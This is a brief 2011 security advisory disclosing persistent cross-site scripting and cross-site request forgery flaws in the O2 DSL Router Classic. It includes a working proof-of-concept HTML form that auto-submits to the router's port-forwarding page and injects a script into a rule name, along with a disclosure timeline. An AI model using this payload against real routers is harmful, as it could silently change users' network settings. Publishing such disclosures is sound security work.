O2 classic router: persistent cross site scripting (XSS) and cross site request forgery (CSRF)
The default DSL router shipped by the german company O2 is completely vulnerable to persistent cross site scripting (XSS) and cross site request forgery (CSRF). The device is produced by ZyXEL, it seems it has no other name than the brand "O2 DSL Router Classic".
<form id="form1" method="post" action="http://192.168.1.1/Forms/PortForwarding_Edit_1"> <input name="PortRule_Name" value='"><script>alert(7)</script>'> <input name="PortRule_SPort" value="77"> <input name="PortRule_EPort" value="77"> <input name="PortRule_SrvAddr" value="10.0.0.1" > <script> var frm = document.getElementById("form1"); frm.submit(); </script> This is just an example, all forms in the router interface are vulnerable to CSRF and, if they accept text input, to XSS.
The vulnerability has been disclosed to O2 in advance without any reply.
2011-02-03: Vendor contacted 2011-04-07: Published advisory
This vulnerability was discovered by Hanno Boeck, http://www.hboeck.de, of schokokeks.org webhosting.